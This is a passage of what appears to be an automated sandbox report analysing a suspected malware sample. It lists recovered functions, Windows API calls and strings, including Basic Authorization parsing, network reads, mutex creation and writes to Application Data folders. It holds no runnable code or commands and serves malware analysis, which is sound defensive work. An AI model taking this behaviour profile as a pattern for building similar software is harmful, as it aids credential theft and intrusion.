Function 00C35AD5, Relevance: 6.3, APIs: 3, Instructions: 10

APIs

GetLastError.KERNEL32(?,00C2BA1E), ref: 00C35AD6
TlsSetValue.KERNEL32(00000000), ref: 00C35AE6
SetLastError.KERNEL32(?,?,00C2BA1E), ref: 00C35AED

Memory Dump Source

Source File: 00000002.00000002.827706237.00C20000.00000040.sdmp, Offset: 00C20000, based on PE: true

Function 00FE0181, Relevance: 6.3, APIs: 1, Strings: 2, Instructions: 91

APIs

Part of subcall function 00FF3CFF: StrCmpNA.SHLWAPI(Basic ,?,00000000), ref: 00FF3D14
Part of subcall function 00FF3CFF: lstrcmpA.KERNEL32(Basic ,?,00FE01C0,00000006,Authorization,?,?,?), ref: 00FF3D1E

StrChrA.SHLWAPI(?,0000003A), ref: 00FE0212

Part of subcall function 00FD6A69: HeapFree.KERNEL32(00000000,01111E90,00FD1877,?,00000000,00FE4986,?,?,00000001), ref: 00FD6A76

Strings

Authorization, xrefs: 00FE0191
Basic , xrefs: 00FE01B6

Memory Dump Source

Source File: 00000002.00000002.827929518.00FC0000.00000040.sdmp, Offset: 00FC0000, based on PE: true

Function 00C40181, Relevance: 6.3, APIs: 1, Strings: 2, Instructions: 91

APIs

Part of subcall function 00C53CFF: StrCmpNA.SHLWAPI(Basic ,?,00000000), ref: 00C53D14
Part of subcall function 00C53CFF: lstrcmpA.KERNEL32(Basic ,?,00C401C0,00000006,Authorization,?,?,?), ref: 00C53D1E

StrChrA.SHLWAPI(?,0000003A), ref: 00C40212

Part of subcall function 00C36A69: HeapFree.KERNEL32(00000000,00F41E90,00C31877,?,00000000,00C44986,?,?,00000001), ref: 00C36A76

Strings

Authorization, xrefs: 00C40191
Basic , xrefs: 00C401B6

Memory Dump Source

Source File: 00000002.00000002.827706237.00C20000.00000040.sdmp, Offset: 00C20000, based on PE: true

Function 00FCA509, Relevance: 6.3, APIs: 2, Strings: 1, Instructions: 66

APIs

Part of subcall function 00FC9F72: memcpy.MSVCRT ref: 00FC9F80

MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,?,00000014), ref: 00FCA54A

Part of subcall function 00FE432D: memcpy.MSVCRT ref: 00FE439E
Part of subcall function 00FE432D: PathRemoveBackslashW.SHLWAPI ref: 00FE43A8
Part of subcall function 00FE432D: memcpy.MSVCRT ref: 00FE43F1
Part of subcall function 00FE432D: memcpy.MSVCRT ref: 00FE441E
Part of subcall function 00FE432D: PathRemoveBackslashW.SHLWAPI(?), ref: 00FE4428

PathRenameExtensionW.SHLWAPI(?,?), ref: 00FCA59B

Strings

C:\Documents and Settings\Administrator\Application Data, xrefs: 00FCA56B

Memory Dump Source

Source File: 00000002.00000002.827929518.00FC0000.00000040.sdmp, Offset: 00FC0000, based on PE: true

Function 00C2A509, Relevance: 6.3, APIs: 2, Strings: 1, Instructions: 66

APIs

Part of subcall function 00C29F72: memcpy.MSVCRT ref: 00C29F80

MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,?,00000014), ref: 00C2A54A

Part of subcall function 00C4432D: memcpy.MSVCRT ref: 00C4439E
Part of subcall function 00C4432D: PathRemoveBackslashW.SHLWAPI ref: 00C443A8
Part of subcall function 00C4432D: memcpy.MSVCRT ref: 00C443F1
Part of subcall function 00C4432D: memcpy.MSVCRT ref: 00C4441E
Part of subcall function 00C4432D: PathRemoveBackslashW.SHLWAPI(?), ref: 00C44428

PathRenameExtensionW.SHLWAPI(?,?), ref: 00C2A59B

Strings

C:\Documents and Settings\Administrator\Application Data, xrefs: 00C2A56B

Memory Dump Source

Source File: 00000002.00000002.827706237.00C20000.00000040.sdmp, Offset: 00C20000, based on PE: true

Function 00FCBBAD, Relevance: 6.2, APIs: 2, Strings: 1, Instructions: 46

APIs

Part of subcall function 00FCB6D0: EnterCriticalSection.KERNEL32(01003510,?,00FCBBBB,01111E90,?,00FD1983,?,?,?,?,?,?,00FE48EB,?,?,00000000), ref: 00FCB6E0
Part of subcall function 00FCB6D0: LeaveCriticalSection.KERNEL32(01003510,?,00FD1983,?,?,?,?,?,?,00FE48EB,?,?,00000000), ref: 00FCB715

VerQueryValueW.VERSION(?,00FC75E4,?,?,01111E90,?,00FD1983,?,?,?,?,?,?,00FE48EB), ref: 00FCBBCE
GetModuleHandleW.KERNEL32(?), ref: 00FCBC0F

Part of subcall function 00FCBC27: PathFindFileNameW.SHLWAPI(00000000), ref: 00FCBC6B

Strings

4, xrefs: 00FCBBD9

Memory Dump Source

Source File: 00000002.00000002.827929518.00FC0000.00000040.sdmp, Offset: 00FC0000, based on PE: true

Function 00C2BBAD, Relevance: 6.2, APIs: 2, Strings: 1, Instructions: 46

APIs

Part of subcall function 00C2B6D0: EnterCriticalSection.KERNEL32(00C63510,?,00C2BBBB,00F41E90,?,00C31983,?,?,?,?,?,?,00C448EB,?,?,00000000), ref: 00C2B6E0
Part of subcall function 00C2B6D0: LeaveCriticalSection.KERNEL32(00C63510,?,00C31983,?,?,?,?,?,?,00C448EB,?,?,00000000), ref: 00C2B715

VerQueryValueW.VERSION(?,00C275E4,?,?,00F41E90,?,00C31983,?,?,?,?,?,?,00C448EB), ref: 00C2BBCE
GetModuleHandleW.KERNEL32(?), ref: 00C2BC0F

Part of subcall function 00C2BC27: PathFindFileNameW.SHLWAPI(00000000), ref: 00C2BC6B

Strings

4, xrefs: 00C2BBD9

Memory Dump Source

Source File: 00000002.00000002.827706237.00C20000.00000040.sdmp, Offset: 00C20000, based on PE: true

Function 0351E2D8, Relevance: 6.2, APIs: 2, Strings: 1, Instructions: 40

APIs

GetModuleHandleW.KERNEL32(KERNEL32.DLL), ref: 0351E2E9

Part of subcall function 0351EB3A: EnterCriticalSection.KERNEL32(?,?,?,0351E322,0000000D,?,00000000,?,?,?,0351EFA8,0351F652,?,0351D8A6,00000003), ref: 0351EB64

InterlockedIncrement.KERNEL32(?,?,00000000), ref: 0351E32A

Part of subcall function 0351FFBF: InterlockedIncrement.KERNEL32(?,00000001,?), ref: 0351FFD1
Part of subcall function 0351FFBF: InterlockedIncrement.KERNEL32(?,?,0351E361), ref: 0351FFDE
Part of subcall function 0351FFBF: InterlockedIncrement.KERNEL32(?,?,0351E361), ref: 0351FFEB
Part of subcall function 0351FFBF: InterlockedIncrement.KERNEL32(?,?,0351E361), ref: 0351FFF8
Part of subcall function 0351FFBF: InterlockedIncrement.KERNEL32(?,?,0351E361), ref: 03520005
Part of subcall function 0351FFBF: InterlockedIncrement.KERNEL32(?,?,0351E361), ref: 03520021
Part of subcall function 0351FFBF: InterlockedIncrement.KERNEL32(?,?,0351E361), ref: 03520031
Part of subcall function 0351FFBF: InterlockedIncrement.KERNEL32(?,?,0351E361), ref: 03520047

Strings

KERNEL32.DLL, xrefs: 0351E2E4

Memory Dump Source

Source File: 00000002.00000002.828112965.03501000.00000020.sdmp, Offset: 03500000, based on PE: true

Associated: 00000002.00000002.828095997.03500000.00000002.sdmp
Associated: 00000002.00000002.828175402.03522000.00000002.sdmp
Associated: 00000002.00000002.828231158.03540000.00000008.sdmp
Associated: 00000002.00000002.828283216.03559000.00000004.sdmp
Associated: 00000002.00000002.828301623.0355C000.00000002.sdmp

Function 00FE46CB, Relevance: 6.2, APIs: 1, Strings: 2, Instructions: 34

APIs

GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00FE470E

Part of subcall function 00FF3D5A: memcpy.MSVCRT ref: 00FF3D94

Part of subcall function 00FE4214: EnterCriticalSection.KERNEL32(01003510,?,01002DB4,00000000,00000006,?,00FEBBC2,01002DB4,?,?,00000000), ref: 00FE422E
Part of subcall function 00FE4214: LeaveCriticalSection.KERNEL32(01003510,?,01002DB4,00000000,00000006,?,00FEBBC2,01002DB4,?,?,00000000), ref: 00FE4261
Part of subcall function 00FE4214: CoTaskMemFree.OLE32(00000000), ref: 00FE42F6
Part of subcall function 00FE4214: PathRemoveBackslashW.SHLWAPI(?), ref: 00FE4303
Part of subcall function 00FE4214: SHGetFolderPathW.SHELL32(00000000,?,00000000,00000000,?), ref: 00FE431A

Strings

C:\Documents and Settings\Administrator\Application Data, xrefs: 00FE46D9
C:\Documents and Settings\Administrator\Local Settings\Application Data, xrefs: 00FE46EE

Memory Dump Source

Source File: 00000002.00000002.827929518.00FC0000.00000040.sdmp, Offset: 00FC0000, based on PE: true

Function 00C446CB, Relevance: 6.2, APIs: 1, Strings: 2, Instructions: 34

APIs

GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00C4470E

Part of subcall function 00C53D5A: memcpy.MSVCRT ref: 00C53D94

Part of subcall function 00C44214: EnterCriticalSection.KERNEL32(00C63510,?,00C62DB4,00000000,00000006,?,00C4BBC2,00C62DB4,?,?,00000000), ref: 00C4422E
Part of subcall function 00C44214: LeaveCriticalSection.KERNEL32(00C63510,?,00C62DB4,00000000,00000006,?,00C4BBC2,00C62DB4,?,?,00000000), ref: 00C44261
Part of subcall function 00C44214: CoTaskMemFree.OLE32(00000000), ref: 00C442F6
Part of subcall function 00C44214: PathRemoveBackslashW.SHLWAPI(?), ref: 00C44303
Part of subcall function 00C44214: SHGetFolderPathW.SHELL32(00000000,?,00000000,00000000,?), ref: 00C4431A

Strings

C:\Documents and Settings\Administrator\Application Data, xrefs: 00C446D9
C:\Documents and Settings\Administrator\Local Settings\Application Data, xrefs: 00C446EE

Memory Dump Source

Source File: 00000002.00000002.827706237.00C20000.00000040.sdmp, Offset: 00C20000, based on PE: true

Function 00FD93E9, Relevance: 6.2, APIs: 4, Instructions: 70

APIs

Part of subcall function 00FD69B0: HeapAlloc.KERNEL32(00000008,?,?,00FD519B,?,?,?,?,00FE46A1,?,00FE49A5,?,?,00000001), ref: 00FD69C1

SetLastError.KERNEL32(00000008,00003A98,?,00000000,00FD9326,?,?,00000000), ref: 00FD9412
memcpy.MSVCRT ref: 00FD9432
memcpy.MSVCRT ref: 00FD946A
memcpy.MSVCRT ref: 00FD9482

Memory Dump Source

Source File: 00000002.00000002.827929518.00FC0000.00000040.sdmp, Offset: 00FC0000, based on PE: true

Function 00C393E9, Relevance: 6.2, APIs: 4, Instructions: 70

APIs

Part of subcall function 00C369B0: HeapAlloc.KERNEL32(00000008,?,?,00C3519B,?,?,?,?,00C446A1,?,00C449A5,?,?,00000001), ref: 00C369C1

SetLastError.KERNEL32(00000008,00003A98,?,00000000,00C39326,?,?,00000000), ref: 00C39412
memcpy.MSVCRT ref: 00C39432
memcpy.MSVCRT ref: 00C3946A
memcpy.MSVCRT ref: 00C39482

Memory Dump Source

Source File: 00000002.00000002.827706237.00C20000.00000040.sdmp, Offset: 00C20000, based on PE: true

Function 00FD1BDD, Relevance: 6.2, APIs: 2, Strings: 1, Instructions: 17

APIs

#6.OLEAUT32 ref: 00FD1BE7
#2.OLEAUT32(ProhibitDTD), ref: 00FD1BF5

Strings

ProhibitDTD, xrefs: 00FD1BF0

Memory Dump Source

Source File: 00000002.00000002.827929518.00FC0000.00000040.sdmp, Offset: 00FC0000, based on PE: true

Function 00C31BDD, Relevance: 6.2, APIs: 2, Strings: 1, Instructions: 17

APIs

#6.OLEAUT32 ref: 00C31BE7
#2.OLEAUT32(ProhibitDTD), ref: 00C31BF5

Strings

ProhibitDTD, xrefs: 00C31BF0

Memory Dump Source

Source File: 00000002.00000002.827706237.00C20000.00000040.sdmp, Offset: 00C20000, based on PE: true

Function 00FCF20B, Relevance: 6.2, APIs: 4, Instructions: 63

APIs

memset.MSVCRT ref: 00FCF219
memcpy.MSVCRT ref: 00FCF23A
memcpy.MSVCRT ref: 00FCF260
memcpy.MSVCRT ref: 00FCF284

Memory Dump Source

Source File: 00000002.00000002.827929518.00FC0000.00000040.sdmp, Offset: 00FC0000, based on PE: true

Function 00C2F20B, Relevance: 6.2, APIs: 4, Instructions: 63

APIs

memset.MSVCRT ref: 00C2F219
memcpy.MSVCRT ref: 00C2F23A
memcpy.MSVCRT ref: 00C2F260
memcpy.MSVCRT ref: 00C2F284

Memory Dump Source

Source File: 00000002.00000002.827706237.00C20000.00000040.sdmp, Offset: 00C20000, based on PE: true

Function 00FF1E96, Relevance: 6.2, APIs: 4, Instructions: 60

APIs

EnterCriticalSection.KERNEL32(?,?,?,?,00FCCAC8,?,?,00000000,?,?,?,00000000,0000EA60), ref: 00FF1E9C
memcmp.MSVCRT ref: 00FF1EC8
memcpy.MSVCRT ref: 00FF1F13
LeaveCriticalSection.KERNEL32(?,00000000,?,?,?,00000000,0000EA60), ref: 00FF1F1F

Memory Dump Source

Source File: 00000002.00000002.827929518.00FC0000.00000040.sdmp, Offset: 00FC0000, based on PE: true

Function 00C51E96, Relevance: 6.2, APIs: 4, Instructions: 60

APIs

EnterCriticalSection.KERNEL32(?,?,?,?,00C2CAC8,?,?,00000000,?,?,?,00000000,0000EA60), ref: 00C51E9C
memcmp.MSVCRT ref: 00C51EC8
memcpy.MSVCRT ref: 00C51F13
LeaveCriticalSection.KERNEL32(?,00000000,?,?,?,00000000,0000EA60), ref: 00C51F1F

Memory Dump Source

Source File: 00000002.00000002.827706237.00C20000.00000040.sdmp, Offset: 00C20000, based on PE: true

Function 00FE1215, Relevance: 6.2, APIs: 4, Instructions: 38

APIs

memset.MSVCRT ref: 00FE122B
InitializeCriticalSection.KERNEL32(01002910), ref: 00FE123B

Part of subcall function 00FC9F72: memcpy.MSVCRT ref: 00FC9F80

memset.MSVCRT ref: 00FE126A
InitializeCriticalSection.KERNEL32(010028F0), ref: 00FE1274

Memory Dump Source

Source File: 00000002.00000002.827929518.00FC0000.00000040.sdmp, Offset: 00FC0000, based on PE: true

Function 00C41215, Relevance: 6.2, APIs: 4, Instructions: 38

APIs

memset.MSVCRT ref: 00C4122B
InitializeCriticalSection.KERNEL32(00C62910), ref: 00C4123B

Part of subcall function 00C29F72: memcpy.MSVCRT ref: 00C29F80

memset.MSVCRT ref: 00C4126A
InitializeCriticalSection.KERNEL32(00C628F0), ref: 00C41274

Memory Dump Source

Source File: 00000002.00000002.827706237.00C20000.00000040.sdmp, Offset: 00C20000, based on PE: true

Function 00C4582C, Relevance: 6.2, APIs: 3, Instructions: 38

APIs

EnterCriticalSection.KERNEL32(00C63510,?,?,?,00C3E9BA), ref: 00C45842
LeaveCriticalSection.KERNEL32(00C63510,?,?,?,00C3E9BA), ref: 00C45868

Part of subcall function 00C4575A: memset.MSVCRT ref: 00C45774
Part of subcall function 00C4575A: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,?,00000014), ref: 00C457BA

CreateMutexW.KERNEL32(00C62974,00000000,00C636DE), ref: 00C4587A

Part of subcall function 00C32F31: WaitForSingleObject.KERNEL32(?,000000FF), ref: 00C32F37
Part of subcall function 00C32F31: CloseHandle.KERNEL32 ref: 00C32F49

Memory Dump Source

Source File: 00000002.00000002.827706237.00C20000.00000040.sdmp, Offset: 00C20000, based on PE: true

Function 00FDBFCE, Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 141

APIs

memcpy.MSVCRT ref: 00FDC0ED
GetLastError.KERNEL32(?,?,?,?,?,?,00000001,?,00000000,00000000), ref: 00FDC10C

Part of subcall function 00FCF825: InterlockedDecrement.KERNEL32(00000004,00000004,00000000), ref: 00FCF82D

Part of subcall function 00FDCC9C: SetLastError.KERNEL32(00000008,00001000,?,?,?,00000001,?,?,?,?,?,00000000,?,?,00000001), ref: 00FDCDAF

Part of subcall function 00FD5A9B: GetLastError.KERNEL32(?,00000000,00FDC683,?,00000000,00000000,?,00000001,?,00000000,00000000,?,?,?,00000000), ref: 00FD5A9D
Part of subcall function 00FD5A9B: TlsGetValue.KERNEL32(?,?,00000000), ref: 00FD5ABA
Part of subcall function 00FD5A9B: SetLastError.KERNEL32(?,?,00000000,00FDC683,?,00000000,00000000,?,00000001,?,00000000,00000000,?,?,?,00000000), ref: 00FD5ACA

Part of subcall function 00FD5A4F: GetLastError.KERNEL32(?,?,00FCB9B4), ref: 00FD5A51
Part of subcall function 00FD5A4F: TlsGetValue.KERNEL32(?,?,00FCB9B4), ref: 00FD5A6E
Part of subcall function 00FD5A4F: TlsSetValue.KERNEL32(00000001), ref: 00FD5A80
Part of subcall function 00FD5A4F: SetLastError.KERNEL32(?,?,00FCB9B4), ref: 00FD5A90

Part of subcall function 00FD5AD5: GetLastError.KERNEL32(?,00FCBA1E), ref: 00FD5AD6
Part of subcall function 00FD5AD5: TlsSetValue.KERNEL32(00000000), ref: 00FD5AE6
Part of subcall function 00FD5AD5: SetLastError.KERNEL32(?,?,00FCBA1E), ref: 00FD5AED

Part of subcall function 00FD7DF0: EnterCriticalSection.KERNEL32(00000014,?,?,?,?,00FCB9D5,00000003,?,00000000,00000000), ref: 00FD7E07
Part of subcall function 00FD7DF0: InterlockedIncrement.KERNEL32(?,?), ref: 00FD7E5B
Part of subcall function 00FD7DF0: LeaveCriticalSection.KERNEL32(00000014,?,?,?,00000000,?,?,?,?,00FCB9D5,00000003,?,00000000,00000000), ref: 00FD7E62

Part of subcall function 00FD7E75: EnterCriticalSection.KERNEL32(00000014,00000000,00000001,?,00000000,00FDC026,00000001,?), ref: 00FD7E8F
Part of subcall function 00FD7E75: LeaveCriticalSection.KERNEL32(00000014,?,?,?), ref: 00FD7EBE

Strings

d, xrefs: 00FDBFE8
n, xrefs: 00FDBFF5

Memory Dump Source

Source File: 00000002.00000002.827929518.00FC0000.00000040.sdmp, Offset: 00FC0000, based on PE: true

Function 00C3BFCE, Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 141

APIs

memcpy.MSVCRT ref: 00C3C0ED
GetLastError.KERNEL32(?,?,?,?,?,?,00000001,?,00000000,00000000), ref: 00C3C10C

Part of subcall function 00C2F825: InterlockedDecrement.KERNEL32(00000004,00000004,00000000), ref: 00C2F82D

Part of subcall function 00C3CC9C: SetLastError.KERNEL32(00000008,00001000,?,?,?,00000001,?,?,?,?,?,00000000,?,?,00000001), ref: 00C3CDAF

Part of subcall function 00C35A9B: GetLastError.KERNEL32(?,00000000,00C3C683,?,00000000,00000000,?,00000001,?,00000000,00000000,?,?,?,00000000), ref: 00C35A9D
Part of subcall function 00C35A9B: TlsGetValue.KERNEL32(?,?,00000000), ref: 00C35ABA
Part of subcall function 00C35A9B: SetLastError.KERNEL32(?,?,00000000,00C3C683,?,00000000,00000000,?,00000001,?,00000000,00000000,?,?,?,00000000), ref: 00C35ACA

Part of subcall function 00C35A4F: GetLastError.KERNEL32(?,?,00C2B9B4), ref: 00C35A51
Part of subcall function 00C35A4F: TlsGetValue.KERNEL32(?,?,00C2B9B4), ref: 00C35A6E
Part of subcall function 00C35A4F: TlsSetValue.KERNEL32(00000001), ref: 00C35A80
Part of subcall function 00C35A4F: SetLastError.KERNEL32(?,?,00C2B9B4), ref: 00C35A90

Part of subcall function 00C35AD5: GetLastError.KERNEL32(?,00C2BA1E), ref: 00C35AD6
Part of subcall function 00C35AD5: TlsSetValue.KERNEL32(00000000), ref: 00C35AE6
Part of subcall function 00C35AD5: SetLastError.KERNEL32(?,?,00C2BA1E), ref: 00C35AED

Part of subcall function 00C37DF0: EnterCriticalSection.KERNEL32(00000014,?,?,?,?,00C2B9D5,00000003,?,00000000,00000000), ref: 00C37E07
Part of subcall function 00C37DF0: InterlockedIncrement.KERNEL32(?,?), ref: 00C37E5B
Part of subcall function 00C37DF0: LeaveCriticalSection.KERNEL32(00000014,?,?,?,00000000,?,?,?,?,00C2B9D5,00000003,?,00000000,00000000), ref: 00C37E62

Part of subcall function 00C37E75: EnterCriticalSection.KERNEL32(00000014,00000000,00000001,?,00000000,00C3C026,00000001,?), ref: 00C37E8F
Part of subcall function 00C37E75: LeaveCriticalSection.KERNEL32(00000014,?,?,?), ref: 00C37EBE

Strings

d, xrefs: 00C3BFE8
n, xrefs: 00C3BFF5

Memory Dump Source

Source File: 00000002.00000002.827706237.00C20000.00000040.sdmp, Offset: 00C20000, based on PE: true

Function 0351FC8F, Relevance: 6.1, APIs: 4, Instructions: 116

APIs

Part of subcall function 0351F986: InterlockedDecrement.KERNEL32(?,0353EFD8,0000000C), ref: 0351F9DF
Part of subcall function 0351F986: InterlockedIncrement.KERNEL32(00872CA8,0353EFD8,0000000C), ref: 0351FA0A

Part of subcall function 0351FA2A: GetOEMCP.KERNEL32 ref: 0351FA53
Part of subcall function 0351FA2A: GetACP.KERNEL32 ref: 0351FA76

Part of subcall function 0351FEE0: Sleep.KERNEL32(00000000), ref: 0351FF01

Part of subcall function 0351FAA6: IsValidCodePage.KERNEL32 ref: 0351FB19
Part of subcall function 0351FAA6: GetCPInfo.KERNEL32(?,?), ref: 0351FB2C

InterlockedDecrement.KERNEL32(FFFFF075,0353EFF8,00000014), ref: 0351FD05
InterlockedIncrement.KERNEL32 ref: 0351FD2A

Part of subcall function 0351EB3A: EnterCriticalSection.KERNEL32(?,?,?,0351E322,0000000D,?,00000000,?,?,?,0351EFA8,0351F652,?,0351D8A6,00000003), ref: 0351EB64

InterlockedDecrement.KERNEL32 ref: 0351FDBC
InterlockedIncrement.KERNEL32 ref: 0351FDE0

Part of subcall function 0351FE47: HeapFree.KERNEL32(00000000,00000000,?,0351E3F6,?,?,?,?,0351EFA8,0351F652,?,0351D8A6,00000003), ref: 0351FE5D
Part of subcall function 0351FE47: GetLastError.KERNEL32(?,?,0351E3F6,?,?,?,?,0351EFA8,0351F652,?,0351D8A6,00000003), ref: 0351FE6F

Memory Dump Source

Source File: 00000002.00000002.828112965.03501000.00000020.sdmp, Offset: 03500000, based on PE: true

Associated: 00000002.00000002.828095997.03500000.00000002.sdmp
Associated: 00000002.00000002.828175402.03522000.00000002.sdmp
Associated: 00000002.00000002.828231158.03540000.00000008.sdmp
Associated: 00000002.00000002.828283216.03559000.00000004.sdmp
Associated: 00000002.00000002.828301623.0355C000.00000002.sdmp

Function 00FD9067, Relevance: 6.1, APIs: 4, Instructions: 89

APIs

memset.MSVCRT ref: 00FD908C

Part of subcall function 00FD6997: HeapAlloc.KERNEL32(00000000,00000024,?,00FD17BF,?,00000000,00FE4986,?,?,00000001), ref: 00FD69A8

InternetReadFile.WININET(00FD388E,?,00001000,?), ref: 00FD90DE
WaitForSingleObject.KERNEL32(00000000,00000000), ref: 00FD90BB

Part of subcall function 00FD6AAB: memcpy.MSVCRT ref: 00FD6AD1

Part of subcall function 00FD6A69: HeapFree.KERNEL32(00000000,01111E90,00FD1877,?,00000000,00FE4986,?,?,00000001), ref: 00FD6A76

SetLastError.KERNEL32(00000000,?,00001000,?,?,00000000,?,00000001,?,00FD388E,?,00000CCA,?,?,00000001), ref: 00FD9132

Memory Dump Source

Source File: 00000002.00000002.827929518.00FC0000.00000040.sdmp, Offset: 00FC0000, based on PE: true

Function 00C39067, Relevance: 6.1, APIs: 4, Instructions: 89

APIs

memset.MSVCRT ref: 00C3908C

Part of subcall function 00C36997: HeapAlloc.KERNEL32(00000000,00000024,?,00C317BF,?,00000000,00C44986,?,?,00000001), ref: 00C369A8

InternetReadFile.WININET(00C3388E,?,00001000,?), ref: 00C390DE
WaitForSingleObject.KERNEL32(00000000,00000000), ref: 00C390BB

Part of subcall function 00C36AAB: memcpy.MSVCRT ref: 00C36AD1

Part of subcall function 00C36A69: HeapFree.KERNEL32(00000000,00F41E90,00C31877,?,00000000,00C44986,?,?,00000001), ref: 00C36A76

SetLastError.KERNEL32(00000000,?,00001000,?,?,00000000,?,00000001,?,00C3388E,?,00000CCA,?,?,00000001), ref: 00C39132

Memory Dump Source

Source File: 00000002.00000002.827706237.00C20000.00000040.sdmp, Offset: 00C20000, based on PE: true

Function 00FD72C2, Relevance: 6.1, APIs: 4, Instructions: 85

APIs

Part of subcall function 00FF3993: memcpy.MSVCRT ref: 00FF3AA4

Part of subcall function 00FCE524: SetFilePointerEx.KERNEL32(?,00000000,00000000,00000000,?), ref: 00FCE534

WriteFile.KERNEL32(?,?,00000005,?,00000000), ref: 00FD732F
WriteFile.KERNEL32(?,?,?,?,00000000), ref: 00FD7347
FlushFileBuffers.KERNEL32(?), ref: 00FD7361
SetEndOfFile.KERNEL32 ref: 00FD737B

Part of subcall function 00FD6A69: HeapFree.KERNEL32(00000000,01111E90,00FD1877,?,00000000,00FE4986,?,?,00000001), ref: 00FD6A76

Part of subcall function 00FCE4F0: SetFilePointerEx.KERNEL32(?,00000000,00000000,?,00000001), ref: 00FCE502

Memory Dump Source

Source File: 00000002.00000002.827929518.00FC0000.00000040.sdmp, Offset: 00FC0000, based on PE: true

Function 00C372C2, Relevance: 6.1, APIs: 4, Instructions: 85

APIs

Part of subcall function 00C53993: memcpy.MSVCRT ref: 00C53AA4

Part of subcall function 00C2E524: SetFilePointerEx.KERNEL32(?,?,?,00000000,00000000), ref: 00C2E534

WriteFile.KERNEL32(?,?,00000005,?,00000000), ref: 00C3732F
WriteFile.KERNEL32(?,?,?,?,00000000), ref: 00C37347
FlushFileBuffers.KERNEL32(?), ref: 00C37361
SetEndOfFile.KERNEL32 ref: 00C3737B

Part of subcall function 00C36A69: HeapFree.KERNEL32(00000000,00F41E90,00C31877,?,00000000,00C44986,?,?,00000001), ref: 00C36A76

Part of subcall function 00C2E4F0: SetFilePointerEx.KERNEL32(?,00000000,00000000,?,00000001), ref: 00C2E502

Memory Dump Source

Source File: 00000002.00000002.827706237.00C20000.00000040.sdmp, Offset: 00C20000, based on PE: true

Function 00C55A2D, Relevance: 6.1, APIs: 4, Instructions: 85

APIs

Part of subcall function 00C5046D: EnterCriticalSection.KERNEL32(00C630F4,?,?,00C2E3BD,00000000,?,?,00000001), ref: 00C5047A
Part of subcall function 00C5046D: LeaveCriticalSection.KERNEL32(00C630F4,?,?,00C2E3BD,00000000,?,?,00000001), ref: 00C50488

GetTempFileNameW.KERNEL32(00000426,?,?,?), ref: 00C55A84
PathFindFileNameW.SHLWAPI(?), ref: 00C55A93
WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,?,00000000,00000000), ref: 00C55ACC
memcpy.MSVCRT ref: 00C55AF1

Memory Dump Source

Source File: 00000002.00000002.827706237.00C20000.00000040.sdmp, Offset: 00C20000, based on PE: true

Function 00FEFC7C, Relevance: 6.1, APIs: 4, Instructions: 77

APIs

GetTickCount.KERNEL32 ref: 00FEFC87
EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,00000002), ref: 00FEFC99
memcmp.MSVCRT ref: 00FEFCD3
LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,00000002), ref: 00FEFD3F

Memory Dump Source

Source File: 00000002.00000002.827929518.00FC0000.00000040.sdmp, Offset: 00FC0000, based on PE: true

Function 00C4FC7C, Relevance: 6.1, APIs: 4, Instructions: 77

APIs

GetTickCount.KERNEL32 ref: 00C4FC87
EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,00000002), ref: 00C4FC99
memcmp.MSVCRT ref: 00C4FCD3
LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,00000002), ref: 00C4FD3F

Memory Dump Source

Source File: 00000002.00000002.827706237.00C20000.00000040.sdmp, Offset: 00C20000, based on PE: true

Function 00FF2F53, Relevance: 6.1, APIs: 4, Instructions: 74

APIs

WSAEventSelect.WS2_32(?,?,?), ref: 00FF2F68
WaitForMultipleObjects.KERNEL32(?,?,00000000,?), ref: 00FF2F9D
WSAEventSelect.WS2_32 ref: 00FF2FEB
WSASetLastError.WS2_32(?,?,?,?,?,?,00000000,?,?,?,?), ref: 00FF2FFE

Memory Dump Source

Source File: 00000002.00000002.827929518.00FC0000.00000040.sdmp, Offset: 00FC0000, based on PE: true

Function 00C52F53, Relevance: 6.1, APIs: 4, Instructions: 74

APIs

WSAEventSelect.WS2_32(?,?,?), ref: 00C52F68
WaitForMultipleObjects.KERNEL32(?,?,00000000,?), ref: 00C52F9D
WSAEventSelect.WS2_32 ref: 00C52FEB
WSASetLastError.WS2_32(?,?,?,?,?,?,00000000,?,?,?,?), ref: 00C52FFE

Memory Dump Source

Source File: 00000002.00000002.827706237.00C20000.00000040.sdmp, Offset: 00C20000, based on PE: true

Function 00FCE141, Relevance: 6.1, APIs: 4, Instructions: 65

APIs

GlobalLock.KERNEL32 ref: 00FCE16A
EnterCriticalSection.KERNEL32(?,000000FF,00000000), ref: 00FCE1A6

Part of subcall function 00FCDE64: EnterCriticalSection.KERNEL32(?,?,?,?,?,00FCE138,?,?,?,?,?,00000009,00000000), ref: 00FCDE7E
Part of subcall function 00FCDE64: memcpy.MSVCRT ref: 00FCDEEF
Part of subcall function 00FCDE64: memcpy.MSVCRT ref: 00FCDF13
Part of subcall function 00FCDE64: memcpy.MSVCRT ref: 00FCDF2A
Part of subcall function 00FCDE64: memcpy.MSVCRT ref: 00FCDF4A
Part of subcall function 00FCDE64: LeaveCriticalSection.KERNEL32 ref: 00FCDF65

LeaveCriticalSection.KERNEL32(?,?,00FC7854,?,000000FF,00000000), ref: 00FCE1CC

Part of subcall function 00FD6A69: HeapFree.KERNEL32(00000000,01111E90,00FD1877,?,00000000,00FE4986,?,?,00000001), ref: 00FD6A76

GlobalUnlock.KERNEL32 ref: 00FCE1D3

Memory Dump Source

Source File: 00000002.00000002.827929518.00FC0000.00000040.sdmp, Offset: 00FC0000, based on PE: true

Function 00C2E141, Relevance: 6.1, APIs: 4, Instructions: 65

APIs

GlobalLock.KERNEL32 ref: 00C2E16A
EnterCriticalSection.KERNEL32(?,000000FF,00000000), ref: 00C2E1A6

Part of subcall function 00C2DE64: EnterCriticalSection.KERNEL32(?,?,?,?,?,00C2E138,?,?,?,?,?,00000009,00000000), ref: 00C2DE7E
Part of subcall function 00C2DE64: memcpy.MSVCRT ref: 00C2DEEF
Part of subcall function 00C2DE64: memcpy.MSVCRT ref: 00C2DF13
Part of subcall function 00C2DE64: memcpy.MSVCRT ref: 00C2DF2A
Part of subcall function 00C2DE64: memcpy.MSVCRT ref: 00C2DF4A
